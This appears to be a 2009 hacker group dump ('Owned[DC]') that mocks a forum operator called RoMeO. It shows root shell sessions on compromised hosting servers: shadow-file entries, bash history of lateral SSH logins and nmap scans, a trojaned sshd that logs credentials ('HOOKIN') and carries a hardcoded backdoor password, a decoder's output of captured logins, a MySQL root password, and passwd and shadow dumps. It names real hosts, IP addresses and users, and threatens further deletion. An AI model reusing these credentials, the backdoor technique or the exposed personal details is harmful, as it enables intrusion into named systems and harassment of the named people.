themunst:_censored_$YHtOc1ylvVbXQjSjCuMMS.:14017:0:99999:7:::
theregoe:_censored_$U1OUx/hznz7Z/cRxknMpV1:14019:0:99999:7:::
xbox360t:_censored_$52N4Y3wbF4I.j0xw0ybZv0:14027:0:99999:7:::
barbiedo:_censored_$dYASLs0QEHczZNK/xO4l60:14033:0:99999:7:::
c20q8anz:_censored_$5yj/Vw9bVQE1H8gFGnfwl0:14031:0:99999:7:::
bashingr:_censored_$40Rbu9u.CdR54/.QGx5hZ.:14034:0:99999:7:::
hawaiian:_censored_$YXD5Fqnc1wa47hXw5DS1z/:14036:0:99999:7:::
cnewyork:_censored_$auEIntz4K2naChQ6A8j42.:14035:0:99999:7:::
lasvegas:_censored_$O8g7FiIF7Z.G1BLakQhjl.:14035:0:99999:7:::
contourp:_censored_$Mhq3nTK4slo39beK7mAsV/:14036:0:99999:7:::
musiconl:_censored_$g.3Wk0K3xRAd8bzMfetZz0:14036:0:99999:7:::
jokesfor:_censored_$332BH8Z2tQ1.PoLUj0aeQ.:14036:0:99999:7:::
cpanelhorde:*:14037::::::
cpanelphpmyadmin:*:14037::::::
cpanelphppgadmin:*:14037::::::
cpanelroundcube:*:14037::::::
okcityco:_censored_$sRF34svAMlqkUvqPQyEXq/:14039:0:99999:7:::
pasadena:_censored_$IDwtddZgxQPTnlqIEiRd/.:14039:0:99999:7:::
ionsigns:_censored_$Vg7G3SaNWflS1zTsWy.b50:14292:0:99999:7:::
cherubim:_censored_$DIouDCIf0zrNJHJj1Hijy0:14042:0:99999:7:::
sanfranc:_censored_$G1VXarugAKLCe0mTh1mjz1:14042:0:99999:7:::
jillrace:_censored_$GWkRrIh91Slq3d4fP4Ysh/:14042:0:99999:7:::
portland:_censored_$9RiJMMNQaYXloc80zzyve/:14042:0:99999:7:::
newyorkc:_censored_$r/hkQYZAe3aMB2h72VDVE.:14042:0:99999:7:::
renoconc:_censored_$HreCJL6jaESpLR4GNQU2X0:14042:0:99999:7:::
indianap:_censored_$K69/LXuR2.0309THXC3IR1:14042:0:99999:7:::
lvconcer:_censored_$0SOI7NDDrTatWwv1qUtKw.:14042:0:99999:7:::
miamicon:_censored_$10LHNdaYHowHSELzvFlfW.:14042:0:99999:7:::
whatupla:_censored_$qBSgboCAfNT0K55szVNGv0:14322:0:99999:7:::
zconcert:_censored_$kj.cK7mz2sEam.1wusPIQ1:14042:0:99999:7:::
tokyocon:_censored_$bdBjHYHi4oSDqBsL/yHuS0:14042:0:99999:7:::
uhouston:_censored_$x/aaM4f.jxN1wMDYHnc/h.:14042:0:99999:7:::
raleigh:_censored_$tEFo7l/iuN.pRKxTSlCCe1:14042:0:99999:7:::
flagstaf:_censored_$mKfuTWqfxbt3X1ddt5fUK/:14042:0:99999:7:::
phoenixa:_censored_$5R9rVBeLzwZtIXTgSbfI9/:14042:0:99999:7:::
ap6mz0q2:_censored_$cfbHH6J9VN9UOr3KBZ9ts.:14042:0:99999:7:::
xq9s3ma:_censored_$vVfRtpDm4j1Uj08OcYmwG1:14044:0:99999:7:::
jacksonv:_censored_$yOc3XavkD3xVFrV/IyvKF.:14046:0:99999:7:::
exspry:_censored_$R/sFQOBW4EgGIThYQj28k.:14047:0:99999:7:::
exmako:_censored_$/YcknpKQlOCdzVzgWbJRM/:14048:0:99999:7:::
quagmire:_censored_$IrcWo57PYhw9lyNR8FlqR.:14049:0:99999:7:::
njmakos:_censored_$eLWUwH4sqaSjYNDDQD8uc.:14049:0:99999:7:::
vicscust:_censored_$zD1TjhIzUZXrqOlHSMKDv0:14220:0:99999:7:::
losangel:_censored_$ApXNU5tVAZvvTZ8wKhfrG0:14053:0:99999:7:::
newengla:_censored_$1inQwoEWSRR/mbuH/U8fj1:14053:0:99999:7:::
lvconven:_censored_$Pi1JPn.1OrKH5JaI5GjPf0:14055:0:99999:7:::
lvtrades:_censored_$dr.bC2FHXaV6QITM0lmbn1:14055:0:99999:7:::
nyctrade:_censored_$dAeNUEisO8nI1GxoDK7Bq0:14055:0:99999:7:::
services:_censored_$/MGwtjcf.Ru7o7y/HDd6P/:14068:0:99999:7:::
worships:_censored_$DD7lYOZiW2VfGQARqj4Nw/:14070:0:99999:7:::
eworship:_censored_$/RA2I.4drunr/Q5sEk/gA1:14070:0:99999:7:::
aemotors:_censored_$yHBjKMyrCFRYaGnSuAc420:14083:0:99999:7:::
workfrom:_censored_$8whIbBBBjYzZxgDDDuMde.:14091:0:99999:7:::
megaspel:_censored_$aO1t9Wneps4O6nDXFn.84/:14093:0:99999:7:::
espel:_censored_$PNoLG3/nFppUcjJB7Ndkc1:14093:0:99999:7:::
dyna:_censored_$oeAPTO2pNcYr7jguVfS.o0:14097:0:99999:7:::
niklas:_censored_$MLPe0p9S4Wz.ficqPiWE3.:14098:0:99999:7:::
glendale:_censored_$36WbIrHoaY6p.wQHDMKSI/:14112:0:99999:7:::
theworkf:_censored_$k9UTdl9Xszol3vXe8XJex/:14113:0:99999:7:::
missreso:_censored_$cMQPqmDGUCrI5GCTJ95IW1:14114:0:99999:7:::
theletro:_censored_$uSdV14r/ad2VSUSQN076J1:14137:0:99999:7:::
simobilg:_censored_$lgR0ZcRPsacgrXN0CyTph/:14163:0:99999:7:::
concert:_censored_$u78BVeFn/9dqijD5FxFn30:14167:0:99999:7:::
worldsbe:_censored_$KhYsNIhpV/9MpNLsJ7KkD1:14176:0:99999:7:::
x1qo0xmz:_censored_$35pb2Tt3NF7mcdwa8ij0S/:14210:0:99999:7:::
american:_censored_$f64FdDQZShu/QPCT01cig.:14212:0:99999:7:::
firstrat:_censored_$Cg447uD7Pf1PSfs03LyFI0:14217:0:99999:7:::
xq05vz73:_censored_$H96kS5lH6gbiK3ShSPwJG.:14219:0:99999:7:::
imsauto:_censored_$18x.Al7E/c8nKVG5w4ge90:14225:0:99999:7:::
headwayp:_censored_$5.CQnCYJzlFnw10dJB1fo/:14253:0:99999:7:::
performa:_censored_$RXFC0.Y9sd19TL59ulzBy0:14248:0:99999:7:::
snowboar:_censored_$S0pOHKtr37Qp283oBChtz0:14246:0:99999:7:::
importeu:_censored_$0vHEmwZW2WImMY8i961N7.:14260:0:99999:7:::
holyschn:_censored_$yyYCxFr6MAeXOFS4uGZxE1:14262:0:99999:7:::
rivercit:_censored_$JhMlSLJOJxGB84SdIX9VL0:14271:0:99999:7:::
perform:_censored_$MwABPul6js/dDkESj3NCa/:14334:0:99999:7:::
sco:_censored_$mD1J7V6/XgnGKexigg7ZQ/:14342:0:99999:7:::
austinar:_censored_$kwPledBlp5.5FRj7TCsXF.:14349:0:99999:7:::
arlingto:_censored_$HOPfqdVPLDjcKYOYXBssZ.:14350:0:99999:7:::
albuquer:_censored_$IIfpFNji/HFkgySU9QPyZ.:14350:0:99999:7:::
jvconcer:_censored_$Up603l0cXWF0BisBD010v/:14352:0:99999:7:::
sanjosec:_censored_$6lZMqhYCRgu07TQSTca1D.:14352:0:99999:7:::
sdconcer:_censored_$jsdhywYTV6.yqzfh7IApB1:14352:0:99999:7:::
bukemark:_censored_$giCqM37r16fagpVb.7SlB/:14363:0:99999:7:::
laconcer:_censored_$WBI4s4H3O7Slpsk7zrZpj.:14366:0:99999:7:::
dforce:_censored_$fjjNVrQw8LPQCDcgXRUkc1:14392:0:99999:7:::

Owned[DC]:[/backup]# cat ~/.bash_history
ssh 64.191.54.229 -l butts 
#1244614734
ssh 64.191.54.229 -l butts
#1244651529
ssh butts@64.191.54.229
#1244644856
ssh 66.96.220.213 -l makosolutions 
#1244644866
ssh 66.96.220.213 -l makosolutions -p 2222 
#1244645088
ssh 66.96.220.213 -l mako -p 2222
#1244650823
top -c
#1244651468
ssh 66.96.220.213
#1244651606
ssh 66.96.220.213 -l makosolutions 
#1244659374
ifconfig | grep 67.225.142.98
#1244659384
ssh -l butts server.holeinthewallhosting.com
#1244659474
nmap server.holeinthewallhosting.com
#1244659875
ssh -l butts server.holeinthewallhosting.com
#1244659891
ssh -l butts 64.191.54.229
#1244677757
ssh -l  makosolutions  66.96.220.213 
#1244810932
exit
#1244944507
ssh 64.191.54.229 -l butts
#1244971944
ssh -l butts 64.191.54.229
#1245004682
ssh 64.191.116.203
#1245013655
exit
#1245067142
ssh 66.96.220.213
#1245062070
ssh 66.96.220.213
#1245074394
ssh 64.191.116.203
#1245076716
exit
#1245058974
ssh 66.96.220.213
#1245082594
ssh 64.191.116.203
#1245141381
grep nukelar.reality-matrix.org /etc/trueuserdomains 
#1245141388
grep nukelar.reality-matrix.org /etc/userdomains 
#1245141593
ssh 64.191.116.203
#1245161918
ssh 66.96.220.213
#1245161939
telnet 66.96.220.213 22
#1245161953
telnet 66.96.220.213 53
#1245161969
nmap 66.96.220.213
#1245162042
ssh 66.96.220.213 -p 80
#1245147550
ssh 64.191.116.203
#1244659875
ssh -l butts server.holeinthewallhosting.com
#1244659891
ssh -l butts 64.191.54.229
#1244677757
ssh -l  makosolutions  66.96.220.213 // infosec.org.uk
#1244810932
exit
#1244944507
ssh 64.191.54.229 -l butts
#1244971944
ssh -l butts 64.191.54.229
#1245004682
ssh 64.191.116.203
#1245013655
exit
#1245067142
ssh 66.96.220.213
#1245062070
ssh 66.96.220.213
#1245074394
ssh 64.191.116.203
#1245076716
exit
#1245058974
ssh 66.96.220.213
#1245082594
ssh 64.191.116.203
#1245141381
grep nukelar.reality-matrix.org /etc/trueuserdomains 
#1245141388
grep nukelar.reality-matrix.org /etc/userdomains 
#1245141593
ssh 64.191.116.203
#1245161918
ssh 66.96.220.213
#1245161939
telnet 66.96.220.213 22
#1245161953
telnet 66.96.220.213 53
#1245161969
nmap 66.96.220.213
#1245162042
ssh 66.96.220.213 -p 80
#1245147550
ssh 64.191.116.203
#1245184460
ssh 66.96.220.213
#1245199770
ssh -l makosolutions 66.96.220.213 
#1245318670
vi /etc/csf/csf.denyip
#1245318687
ssh 66.96.220.213
#1245318707
ssh root@66.96.220.213
#1245318749
ssh mako@66.96.220.213 -p2222
#1245318770
ssh mako@66.96.220.213 -p 2222
#1245318842
ssh mako@66.96.220.213 -p2222
#1245316906
ssh 66.7.198.124
#1245317031
ssh 66.7.198.124
#1245317159
ssh 66.96.220.213
#1245318179
ssh  66.96.220.213
#1245319038
ssh 67.225.159.152 
#1245319073
ssh 67.225.159.152 -p22
#1245319077
ssh 67.225.159.152 -p 22
.
.
.
csf -l | grep 66.96.211.181
#1245999632
apf
#1246000060
ssh 66.96.211.181 -l root
#1246000637
grep 66.96.211.181 /var/log/messages
#1246002631
cat /usr/local/psa/version
#1246002640
ls /usr/local/psa/version
#1246015247
ls /usr/local/psa/version
#1245998530
ssh 64.191.72.85
#1245998556
telnet 64.191.72.85 25
#1245998595
vzlist -a
#1246001328
ssh 64.191.72.85

Owned[DC]:[/backup]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda7             2.0G  426M  1.5G  23% /
/dev/sdb1             147G   61G   79G  44% /backup
/dev/sda1            1012M   46M  915M   5% /boot
none                  2.0G     0  2.0G   0% /dev/shm
/dev/sda8             121G   32G   83G  28% /home
/dev/sda6             2.0G   37M  1.9G   2% /tmp
/dev/sda2             9.9G  5.6G  3.9G  60% /usr
/dev/sda5             9.9G  2.1G  7.3G  23% /var
/tmp                  2.0G   37M  1.9G   2% /var/tmp
Owned[DC]:[/backup]# 

Owned[DC]:[/etc/pam.d]# cat sshd 
#%PAM-1.0
auth       required     pam_stack.so service=system-auth
auth       required     pam_nologin.so
account    required     pam_stack.so service=system-auth
password   required     pam_stack.so service=system-auth
session    required     pam_stack.so service=system-auth
session    required     pam_loginuid.so

auth       required     pam_shells.so 

Owned[DC]:[/var/run]# hostname
puma.makosolutions.net
Owned[DC]:[/var/run]# 

Owned[DC]:[~]# lsof -i TCP:22
COMMAND   PID   USER   FD   TYPE    DEVICE SIZE NODE NAME
sshd    17433   root    3u  IPv6 791605626       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
sshd    17441 makos2    3u  IPv6 791605626       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
sshd    21409   root    3u  IPv6 791273811       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
sshd    21412 makos2    3u  IPv6 791273811       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
sshd    26799   root    3u  IPv6 791290938       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
sshd    26806 makos2    3u  IPv6 791290938       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
ssh     26887   root    3u  IPv4 791291132       TCP puma.makosolutions.net:42625->serv.localhost:ssh (ESTABLISHED)
sshd    29596   root    3u  IPv6 791533593       TCP puma.makosolutions.net:ssh->188.51.85.13:34957 (ESTABLISHED) 
// RoMeO logged in just before the rm -rf / of makosolutions.com
sshd    30850   root    3u  IPv6 783032196       TCP *:ssh (LISTEN)



_______         _______    ________
\   _  \ ___  __\   _  \  /  _____/
/  /_\  \\  \/  /  /_\  \/   __  \ 
\  \_/   \>    <\  \_/   \  |__\  \
 \_____  /__/\_ \\_____  /\_____  /
       \/      \/      \/       \/ 
.__           .__         .__        __  .__                          .__  .__   
|  |__   ____ |  |   ____ |__| _____/  |_|  |__   ______  _  _______  |  | |  |  
|  |  \ /  _ \|  | _/ __ \|  |/    \   __\  |  \_/ __ \ \/ \/ /\__  \ |  | |  |  
|   Y  (  <_> )  |_\  ___/|  |   |  \  | |   Y  \  ___/\     /  / __ \|  |_|  |__
|___|  /\____/|____/\___  >__|___|  /__| |___|  /\___  >\/\_/  (____  /____/____/
     \/                 \/        \/          \/     \/             \/           
.__                    __  .__                          
|  |__   ____  _______/  |_|__| ____    ____            
|  |  \ /  _ \/  ___/\   __\  |/    \  / ___\    ______ 
|   Y  (  <_> )___ \  |  | |  |   |  \/ /_/  >  /_____/ 
|___|  /\____/____  > |__| |__|___|  /\___  /           
     \/           \/               \//_____/            
__________                _________              
\______   \_______  ____ /   _____/ ____   ____  
 |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
 |    |     |  | \(  <_> )        \  ___/\  \___ 
 |____|     |__|   \____/_______  /\___  >\___  >
                                \/     \/     \/ 


64.191.54.229 0x3aownt:DlE46Y8KpH
                +----------------------------[ Owned ]----------------------------+
                |          Hack everyone you can and then hack some more          |
                |                           Owned[DC] v2                          |
                |                   _______ . _______ . _______                   |
                |             Get in as anonymous, Leave with no trace.           |
                |                                                                 |
                +-----------------------------------------------------------------+
         [ Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 i686 ]

 11:12:13 up 78 days, 17:02,  0 users,  load average: 1.73, 2.17, 2.23
mrich    pts/0        75-28-177-133.li Thu Jun 25 22:40 - 22:47  (00:06)    
jayzer   pts/1        cpe-76-183-78-13 Thu Jun 25 00:45 - 00:49  (00:04)    
fmystic  pts/1        cpe-71-67-100-61 Wed Jun 24 23:27 - 00:14  (00:46)    
butts    pts/0        puma.makosolutio Wed Jun 24 21:47 - 02:54  (05:07)    
bwc05    pts/1        host-136-245.flt Wed Jun 24 00:18 - 00:18  (00:00)    

wtmp begins Wed Apr 29 04:10:02 2009
root@server [~]# 


root@server [~]# lsof -i -n | grep ssh
sshd      13173     root    3u  IPv6 496962909       TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
sshd      13176      hsp    3u  IPv6 496962909       TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
sshd      13285     root    3u  IPv6 496964091       TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
sshd      13287 stephenm    3u  IPv6 496964091       TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
sshd      13287 stephenm    7u  IPv4 505107114       TCP 64.191.54.229:53259->192.168.1.121:icslap (SYN_SENT)
sshd      13287 stephenm    8u  IPv4 505106277       TCP 64.191.54.229:38749->192.121.86.4:http (SYN_SENT)
sshd      30096     root    3u  IPv6 485663697       TCP *:ssh (LISTEN)
root@server [~]# 


root@server [/var/run]# gcc -o decode decode.c 
͏Іʵroot@server [/var/run]# ./decode ssh.old 
HOOKIN: falados:$.lWKq._censored_
HOOKIN: smithah:_censored_
.
.
.
HOOKIN: karsh:vnm_censored_
HOOKIN: karsh:vnm_censored_
HOOKIN: smithah:Coverfir_censored_
HOOKIN: karsh:vn_censored_
HOOKIN: mrich:t23_censored_
root@server [/var/run]# 

root@server [/var/run]# hostname
server.holeinthewallhosting.net
root@server [/var/run]# uname -a
Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 #1 SMP Tue Aug 5 07:41:53 EDT 2008 i686 i686 i386 GNU/Linux
root@server [/var/run]# date
Fri Jun 26 11:16:32 CDT 2009
root@server [/var/run]# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.54.229  Bcast:64.191.54.239  Mask:255.255.255.240
          inet6 addr: fe80::219:d1ff:fefb:459b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:739777531 errors:0 dropped:0 overruns:0 frame:0
          TX packets:970111216 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:587506583 (560.2 MiB)  TX bytes:4170982921 (3.8 GiB)
          Interrupt:217 Base address:0x2000 

eth0:1    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.54.230  Bcast:64.191.54.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:2    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.54.231  Bcast:64.191.54.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:3    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.54.232  Bcast:64.191.54.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:4    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.54.233  Bcast:64.191.54.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:5    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.197  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:6    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.198  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:7    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.199  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:8    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.200  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:9    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.201  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:10   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.202  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:11   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.203  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:12   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.204  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:13   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.205  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:14   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.206  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth1      Link encap:Ethernet  HWaddr 00:50:04:6F:DA:43  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:217 Base address:0x8000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:35636410 errors:0 dropped:0 overruns:0 frame:0
          TX packets:35636410 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1453567506 (1.3 GiB)  TX bytes:1453567506 (1.3 GiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

root@server [/var/run]# 


root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 DlE46Y8KpH
Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
Rhosts authentication refused for %.100s: bad modes for %.200s
Server has been configured to ignore %.100s.
Accepted host %s ip %s client_user %s server_user %s
HOOKIN: %s:%s
DlE46Y8KpH
root@server [/var/run]# 

root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 0x3
check_key_in_hostfiles: key %s for %s
auth1.c
sending challenge '%s'
 ruser %.100s
do_authloop: BN_new failed
0x3aownt

root@server [~]# cat .my.cnf 
[client]
user="root"
pass=",a5.z_censored_"
root@server [~]# 

root@server [/tmp]# cd /var/run/
root@server [/var/run]# ls
./                 couriersslcache        dbus/               mdmpd/           pm/                 saslauthd/       tailwatchd.pid
../                cpanellogd.pid         eximstats/          messagebus.pid   pop3d.pid           screen/          upcp.pid
acpid.socket=      cpdavd.pid             ftpd.sock=          named/           pop3d.pid.lock      sdp=             utmp
audispd_events=    cphulkd_detector.pid   haldaemon.pid       named.pid@       pop3d-ssl.pid       setrans/         winbindd/
auditd.pid         cphulkd_processor.pid  imapd.pid           netreport/       pop3d-ssl.pid.lock  setroubleshoot/  wpa_supplicant/
autofs.fifo-misc|  cphulkd.sock=          imapd.pid.lock      NetworkManager/  ppp/                spamd.pid
autofs.fifo-net|   cpsrvd.pid             imapd-ssl.pid       nscd/            pure-authd.pid      sshd.pid
avahi-daemon/      crond.pid              imapd-ssl.pid.lock  pcscd.comm=      pure-ftpd/          ssh.old
chkservd/          cups/                  klogd.pid           pcscd.pid        pure-ftpd.pid       sudo/
console/           cupsd.pid              mdadm/              pcscd.pub        rpc.statd.pid       syslogd.pid
root@server [/var/run]# cd screen/
root@server [/var/run/screen]# ls
./  ../  S-root/
root@server [/var/run/screen]# cd S-root/
root@server [/var/run/screen/S-root]# ls
./  ../  13472.pts-0.server|
root@server [/var/run/screen/S-root]# cat 13472.pts-0.server


root@server [/var/run/screen/S-root]# ls
./  ../  13472.pts-0.server|
root@server [/var/run/screen/S-root]# cd ..
root@server [/var/run/screen]# ls
./  ../  S-root/
root@server [/var/run/screen]# ps -aux | grep -r screen
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root     25085  0.0  0.0   3920   700 pts/1    S+   11:27   0:00 grep -r screen
root@server [/var/run/screen]# ps -aux | grep -i screen
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root     13472  0.0  0.0   5056  1064 ?        Ss   Jun10   0:00 SCREEN
root     25147  0.0  0.0   3920   680 pts/1    R+   11:27   0:00 grep -i screen
root@server [/var/run/screen]# 


_______         ________________ 
\   _  \ ___  __\   _  \______  \
/  /_\  \\  \/  /  /_\  \  /    /
\  \_/   \>    <\  \_/   \/    / 
 \_____  /__/\_ \\_____  /____/  
       \/      \/      \/        
    .___             __           .__            .___                 
  __| _/____ _______|  | __ _____ |__| ____    __| _/_______          
 / __ |\__  \\_  __ \  |/ //     \|  |/    \  / __ |\___   /   ______ 
/ /_/ | / __ \|  | \/    <|  Y Y  \  |   |  \/ /_/ | /    /   /_____/ 
\____ |(____  /__|  |__|_ \__|_|  /__|___|  /\____ |/_____ \          
     \/     \/           \/     \/        \/      \/      \/          
          ____________   .________
_________/ ____\   _  \  |   ____/
\___   /\   __\/  /_\  \ |____  \ 
 /    /  |  |  \  \_/   \/       \
/_____ \ |__|   \_____  /______  /
      \/              \/       \/ 


                                           |
                                       \       /            _\/_
     darkmindz                           .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     We eat the night, we drink the time                            |
       Make our dreams come true
         And hungry eyes are passing by
           On streets we call the zoo

Darkmindz.com was just another "haxor" AKA idiot breeding ground forum run by
the infamous saudi named RoMeO. Fortunetly due to the recent events RoMeO
decided to kill his site and handle because he was sloppy & cocky enough to link
his anti-sec activities with his public internet "life". This has spared us the
trouble of needing to rm -rf /* his shit, so thx RoMeO, hope we can be friends.
We didn't want a good hax.log to go to waste so we decided to publish darkmindz
anyways.

RoMeO is a blackhat wannabe and gave us good lulz with astalavista, props to
that, but who the fuck is/was ssanz anyway and what's the point of spreading
anti-sec propaganda via imageshack? You can't enjoy the benefits of a blackhat
and run some retarded haxor forum at the same time pal, good to see that you
realized that. But in any case if you decide to put your shitty forum online
again, you will be rm'ed.

Here's what we found in darkmindz land.

root@www.darkmindz.com's password:
Last login: Sat May 23 03:39:06 2009 from cpe-76-175-20-182.socal.res.rr.com
ALERT! You are entering a secured area! Your IP and login information
have been recorded. System administration has been notified.
This system is restricted to authorized access only. All activities on
this system are recorded and logged. Unauthorized access will be fully
investigated and reported to the appropriate law enforcement agencies.

root@server2:~[root@server2 ~]# uname -a; id
Linux server2.hr-development.net 2.6.27.10-grsec #1 SMP Fri May 15 21:34:11 PDT
2009 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
root@server2:~[root@server2 ~]# #who up in this mother fucker
root@server2:~[root@server2 ~]# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
dovecot:x:104:104::/home/dovecot:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
hrdev:x:502:503::/home/hrdev:/bin/false
keytraderz:x:504:505::/home/keytraderz:/bin/false
yourkicks:x:507:508::/home/yourkicks:/bin/false
aaa:x:508:509::/home/aaa:/bin/false
beyond:x:509:510::/home/beyond:/bin/false
hotglow:x:510:511::/home/hotglow:/bin/false
wheelglow:x:512:513::/home/wheelglow:/bin/false
penguin:x:513:514::/home/penguin:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
